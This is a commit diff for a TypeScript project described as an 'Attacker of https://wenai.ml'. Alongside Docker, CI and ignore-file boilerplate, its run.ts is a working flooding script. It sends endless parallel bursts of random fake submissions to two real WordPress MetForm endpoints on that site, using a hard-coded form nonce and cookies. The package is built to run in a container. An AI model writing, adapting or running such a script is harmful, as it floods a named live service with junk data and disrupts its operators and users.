finish

.dockerignore

+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+lerna-debug.log*
+
+# Diagnostic reports (https://nodejs.org/api/report.html)
+report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json
+
+# Runtime data
+pids
+*.pid
+*.seed
+*.pid.lock
+
+# Directory for instrumented libs generated by jscoverage/JSCover
+lib-cov
+
+# Coverage directory used by tools like istanbul
+coverage
+*.lcov
+
+# nyc test coverage
+.nyc_output
+
+# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
+.grunt
+
+# Bower dependency directory (https://bower.io/)
+bower_components
+
+# node-waf configuration
+.lock-wscript
+
+# Compiled binary addons (https://nodejs.org/api/addons.html)
+build/Release
+
+# Dependency directories
+node_modules/
+jspm_packages/
+
+# TypeScript v1 declaration files
+typings/
+
+# TypeScript cache
+*.tsbuildinfo
+
+# Optional npm cache directory
+.npm
+
+# Optional eslint cache
+.eslintcache
+
+# Microbundle cache
+.rpt2_cache/
+.rts2_cache_cjs/
+.rts2_cache_es/
+.rts2_cache_umd/
+
+# Optional REPL history
+.node_repl_history
+
+# Output of 'npm pack'
+*.tgz
+
+# Yarn Integrity file
+.yarn-integrity
+
+# dotenv environment variables file
+.env
+.env.test
+
+# parcel-bundler cache (https://parceljs.org/)
+.cache
+
+# Next.js build output
+.next
+
+# Nuxt.js build / generate output
+.nuxt
+dist
+
+# Gatsby files
+.cache/
+# Comment in the public line in if your project uses Gatsby and *not* Next.js
+# https://nextjs.org/blog/next-9-1#public-directory-support
+# public
+
+# vuepress build output
+.vuepress/dist
+
+# Serverless directories
+.serverless/
+
+# FuseBox cache
+.fusebox/
+
+# DynamoDB Local files
+.dynamodb/
+
+# TernJS port file
+.tern-port
+
+/build
+/output
+
+.git*
+.dockerignore
+Dockerfile
+.gitlab-ci.yml
+/config.yaml
+.idea

.gitignore

+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+lerna-debug.log*
+
+# Diagnostic reports (https://nodejs.org/api/report.html)
+report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json
+
+# Runtime data
+pids
+*.pid
+*.seed
+*.pid.lock
+
+# Directory for instrumented libs generated by jscoverage/JSCover
+lib-cov
+
+# Coverage directory used by tools like istanbul
+coverage
+*.lcov
+
+# nyc test coverage
+.nyc_output
+
+# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
+.grunt
+
+# Bower dependency directory (https://bower.io/)
+bower_components
+
+# node-waf configuration
+.lock-wscript
+
+# Compiled binary addons (https://nodejs.org/api/addons.html)
+build/Release
+
+# Dependency directories
+node_modules/
+jspm_packages/
+
+# TypeScript v1 declaration files
+typings/
+
+# TypeScript cache
+*.tsbuildinfo
+
+# Optional npm cache directory
+.npm
+
+# Optional eslint cache
+.eslintcache
+
+# Microbundle cache
+.rpt2_cache/
+.rts2_cache_cjs/
+.rts2_cache_es/
+.rts2_cache_umd/
+
+# Optional REPL history
+.node_repl_history
+
+# Output of 'npm pack'
+*.tgz
+
+# Yarn Integrity file
+.yarn-integrity
+
+# dotenv environment variables file
+.env
+.env.test
+
+# parcel-bundler cache (https://parceljs.org/)
+.cache
+
+# Next.js build output
+.next
+
+# Nuxt.js build / generate output
+.nuxt
+dist
+
+# Gatsby files
+.cache/
+# Comment in the public line in if your project uses Gatsby and *not* Next.js
+# https://nextjs.org/blog/next-9-1#public-directory-support
+# public
+
+# vuepress build output
+.vuepress/dist
+
+# Serverless directories
+.serverless/
+
+# FuseBox cache
+.fusebox/
+
+# DynamoDB Local files
+.dynamodb/
+
+# TernJS port file
+.tern-port
+
+/build
+/output
+/config.yaml
+.idea

.gitlab-ci.yml

+stages:
+  - build
+  - combine
+  - deploy
+
+variables:
+  GIT_DEPTH: "1"
+  CONTAINER_TEST_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG
+  CONTAINER_TEST_ARM_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG-arm
+  CONTAINER_TEST_X86_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG-x86
+  CONTAINER_RELEASE_IMAGE: $CI_REGISTRY_IMAGE:latest
+
+before_script:
+  - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
+
+build-x86:
+  stage: build
+  tags: 
+    - docker
+  script:
+    - docker build --pull -t $CONTAINER_TEST_X86_IMAGE .
+    - docker push $CONTAINER_TEST_X86_IMAGE
+
+build-arm:
+  stage: build
+  tags: 
+    - docker-arm
+  script:
+    - docker build --pull -t $CONTAINER_TEST_ARM_IMAGE .
+    - docker push $CONTAINER_TEST_ARM_IMAGE
+
+combine:
+  stage: combine
+  tags:
+    - docker
+  script:
+    - docker pull $CONTAINER_TEST_X86_IMAGE
+    - docker pull $CONTAINER_TEST_ARM_IMAGE
+    - docker manifest create $CONTAINER_TEST_IMAGE --amend $CONTAINER_TEST_X86_IMAGE --amend $CONTAINER_TEST_ARM_IMAGE
+    - docker manifest push $CONTAINER_TEST_IMAGE
+
+deploy_latest:
+  stage: deploy
+  tags: 
+    - docker
+  script:
+    - docker pull $CONTAINER_TEST_IMAGE
+    - docker tag $CONTAINER_TEST_IMAGE $CONTAINER_RELEASE_IMAGE
+    - docker push $CONTAINER_RELEASE_IMAGE
+  only:
+    - master
+
+deploy_tag:
+  stage: deploy
+  tags: 
+    - docker
+  variables:
+    CONTAINER_TAG_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_TAG
+  script:
+    - docker pull $CONTAINER_TEST_IMAGE
+    - docker tag $CONTAINER_TEST_IMAGE $CONTAINER_TAG_IMAGE
+    - docker push $CONTAINER_TAG_IMAGE
+  only:
+    - tags

Dockerfile

+FROM node:buster-slim
+LABEL Author="Nanahira <nanahira@momobako.com>"
+
+RUN apt update && apt -y install python3 build-essential && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
+WORKDIR /usr/src/app
+COPY ./package*.json ./
+RUN npm ci
+COPY . ./
+RUN npm run build
+
+CMD ["npm", "run", "start"]

package-lock.json

+{
+  "name": "fuck-wenai-ml",
+  "version": "1.0.0",
+  "lockfileVersion": 1,
+  "requires": true,
+  "dependencies": {
+    "@types/lodash": {
+      "version": "4.14.168",
+      "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.168.tgz",
+      "integrity": "sha512-oVfRvqHV/V6D1yifJbVRU3TMp8OT6o6BG+U9MkwuJ3U8/CsDHvalRpsxBqivn71ztOFZBTfJMvETbqHiaNSj7Q=="
+    },
+    "@types/node": {
+      "version": "14.14.35",
+      "resolved": "https://registry.npmjs.org/@types/node/-/node-14.14.35.tgz",
+      "integrity": "sha512-Lt+wj8NVPx0zUmUwumiVXapmaLUcAk3yPuHCFVXras9k5VT9TdhJqKqGVUQCD60OTMCl0qxJ57OiTL0Mic3Iag=="
+    },
+    "asynckit": {
+      "version": "0.4.0",
+      "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz",
+      "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k="
+    },
+    "axios": {
+      "version": "0.21.1",
+      "resolved": "https://registry.npmjs.org/axios/-/axios-0.21.1.tgz",
+      "integrity": "sha512-dKQiRHxGD9PPRIUNIWvZhPTPpl1rf/OxTYKsqKUDjBwYylTvV7SjSHJb9ratfyzM6wCdLCOYLzs73qpg5c4iGA==",
+      "requires": {
+        "follow-redirects": "^1.10.0"
+      }
+    },
+    "combined-stream": {
+      "version": "1.0.8",
+      "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz",
+      "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==",
+      "requires": {
+        "delayed-stream": "~1.0.0"
+      }
+    },
+    "crypto-random-string": {
+      "version": "3.3.1",
+      "resolved": "https://registry.npmjs.org/crypto-random-string/-/crypto-random-string-3.3.1.tgz",
+      "integrity": "sha512-5j88ECEn6h17UePrLi6pn1JcLtAiANa3KExyr9y9Z5vo2mv56Gh3I4Aja/B9P9uyMwyxNHAHWv+nE72f30T5Dg==",
+      "requires": {
+        "type-fest": "^0.8.1"
+      }
+    },
+    "delayed-stream": {
+      "version": "1.0.0",
+      "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz",
+      "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk="
+    },
+    "follow-redirects": {
+      "version": "1.13.3",
+      "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.13.3.tgz",
+      "integrity": "sha512-DUgl6+HDzB0iEptNQEXLx/KhTmDb8tZUHSeLqpnjpknR70H0nC2t9N73BK6fN4hOvJ84pKlIQVQ4k5FFlBedKA=="
+    },
+    "form-data": {
+      "version": "4.0.0",
+      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz",
+      "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==",
+      "requires": {
+        "asynckit": "^0.4.0",
+        "combined-stream": "^1.0.8",
+        "mime-types": "^2.1.12"
+      }
+    },
+    "lodash": {
+      "version": "4.17.21",
+      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
+      "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg=="
+    },
+    "mime-db": {
+      "version": "1.46.0",
+      "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.46.0.tgz",
+      "integrity": "sha512-svXaP8UQRZ5K7or+ZmfNhg2xX3yKDMUzqadsSqi4NCH/KomcH75MAMYAGVlvXn4+b/xOPhS3I2uHKRUzvjY7BQ=="
+    },
+    "mime-types": {
+      "version": "2.1.29",
+      "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.29.tgz",
+      "integrity": "sha512-Y/jMt/S5sR9OaqteJtslsFZKWOIIqMACsJSiHghlCAyhf7jfVYjKBmLiX8OgpWeW+fjJ2b+Az69aPFPkUOY6xQ==",
+      "requires": {
+        "mime-db": "1.46.0"
+      }
+    },
+    "type-fest": {
+      "version": "0.8.1",
+      "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.8.1.tgz",
+      "integrity": "sha512-4dbzIzqvjtgiM5rw1k5rEHtBANKmdudhGyBEajN01fEyhaAIhsoKNy6y7+IN93IfpFtwY9iqi7kD+xwKhQsNJA=="
+    },
+    "typescript": {
+      "version": "4.2.3",
+      "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.2.3.tgz",
+      "integrity": "sha512-qOcYwxaByStAWrBf4x0fibwZvMRG+r4cQoTjbPtUlrWjBHbmCAww1i448U0GJ+3cNNEtebDteo/cHOR3xJ4wEw=="
+    }
+  }
+}

package.json

+{
+  "name": "fuck-wenai-ml",
+  "version": "1.0.0",
+  "description": "Attacker of https://wenai.ml",
+  "main": "build/run.js",
+  "scripts": {
+    "start": "node build/run.js",
+    "build": "tsc"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git@git.mycard.moe:nanahira/fuck-wenai-ml.git"
+  },
+  "keywords": [
+    "wenai",
+    "wenyuan"
+  ],
+  "author": "Nanahira",
+  "license": "MIT",
+  "dependencies": {
+    "@types/lodash": "^4.14.168",
+    "@types/node": "^14.14.35",
+    "axios": "^0.21.1",
+    "crypto-random-string": "^3.3.1",
+    "form-data": "^4.0.0",
+    "lodash": "^4.17.21",
+    "typescript": "^4.2.3"
+  }
+}

run.ts

+import _FromData from "form-data";
+import cryptoRandomString from "crypto-random-string";
+import axios from "axios";
+const cookieString = "tk_or=%22%22; tk_lr=%22%22; tk_r3d=%22%22";
+import _ from "lodash";
+
+const maxParellel = 20;
+const timeout = 10000;
+
+async function attackRecharge(identifer: string) {
+  console.log(`Started attacking recharge ${identifer}`);
+  const url = "https://wenai.ml/wp-json/metform/v1/entries/insert/3189";
+  const possibleRadios = ["gift", "topup", "register"];
+  const form = new _FromData();
+  form.append("form_nonce", "9780a268ef");
+  form.append(
+    "mf-radio",
+    possibleRadios[Math.floor(Math.random() * possibleRadios.length)]
+  );
+  form.append(
+    "mf-text",
+    cryptoRandomString({ length: 10, type: "alphanumeric" })
+  );
+  form.append(
+    "mf-passcode",
+    cryptoRandomString({ length: 10, type: "alphanumeric" })
+  );
+  form.append("mf-amount", cryptoRandomString({ length: 3, type: "numeric" }));
+  try {
+    const {
+      data: { data },
+      status,
+    } = await axios.post(url, form, {
+      headers: form.getHeaders({
+        Cookie: cookieString,
+      }),
+      responseType: "json",
+      timeout,
+    });
+    console.log(
+      `Attack of recharge ${identifer} success: ${status} ${JSON.stringify(
+        data
+      )}`
+    );
+  } catch (e) {
+    console.error(`Attack of recharge ${identifer} failed: ${e.toString()}`);
+    return false;
+  }
+  return true;
+}
+async function attackJoin(identifer: string) {
+  console.log(`Started attacking join ${identifer}`);
+  const url = "https://wenai.ml/wp-json/metform/v1/entries/insert/3399";
+  const form = new _FromData();
+  form.append("form_nonce", "9780a268ef");
+  form.append(
+    "mf-name",
+    cryptoRandomString({ length: 10, type: "alphanumeric" })
+  );
+  form.append("mf-qq", cryptoRandomString({ length: 10, type: "numeric" }));
+  form.append(
+    "mf-twitter",
+    cryptoRandomString({ length: 10, type: "alphanumeric" })
+  );
+  form.append(
+    "mf-link_to_profile",
+    `https://${cryptoRandomString({
+      length: 3,
+      type: "alphanumeric",
+    })}.${cryptoRandomString({
+      length: 10,
+      type: "alphanumeric",
+    })}.com/${cryptoRandomString({ length: 10, type: "alphanumeric" })}`
+  );
+  form.append(
+    "mf-introduction",
+    cryptoRandomString({ length: 160, type: "alphanumeric" })
+  );
+  form.append("mf-price", cryptoRandomString({ length: 2, type: "numeric" }));
+  form.append(
+    "mf-available_time",
+    cryptoRandomString({ length: 20, type: "alphanumeric" })
+  );
+  form.append(
+    "mf-other_details",
+    cryptoRandomString({ length: 200, type: "alphanumeric" })
+  );
+  try {
+    const {
+      data: { data },
+      status,
+    } = await axios.post(url, form, {
+      headers: form.getHeaders({
+        Cookie: cookieString,
+      }),
+      responseType: "json",
+      timeout,
+    });
+    console.log(
+      `Attack of join ${identifer} success: ${status} ${JSON.stringify(data)}`
+    );
+  } catch (e) {
+    console.error(`Attack of join ${identifer} failed: ${e.toString()}`);
+    return false;
+  }
+  return true;
+}
+async function attackRechargeProcess() {
+  let count = 0;
+  while (true) {
+    ++count;
+    const successCount = (
+      await Promise.all(
+        _.range(maxParellel).map((innerCount) => {
+          return attackRecharge(`${count}-${innerCount}`);
+        })
+      )
+    ).filter((m) => !!m).length;
+    console.log(
+      `${count}: ${successCount} of ${maxParellel} recharge attacks succeeded.`
+    );
+  }
+}
+async function attackJoinProcess() {
+  let count = 0;
+  while (true) {
+    ++count;
+    const successCount = (
+      await Promise.all(
+        _.range(maxParellel).map((innerCount) => {
+          return attackJoin(`${count}-${innerCount}`);
+        })
+      )
+    ).filter((m) => !!m).length;
+    console.log(
+      `${count}: ${successCount} of ${maxParellel} join attacks succeeded.`
+    );
+  }
+}
+
+attackRechargeProcess();
+attackJoinProcess();

tsconfig.json

+{
+	"compilerOptions": {
+		"outDir": "build",
+		"module": "commonjs",
+		"target": "esnext",
+		"esModuleInterop": true,
+		"emitDecoratorMetadata": true,
+		"experimentalDecorators": true,
+		"sourceMap": true
+	},
+	"compileOnSave": true,
+	"allowJs": true,
+	"include": [
+		"*.ts",
+		"src/*.ts"
+	]
+}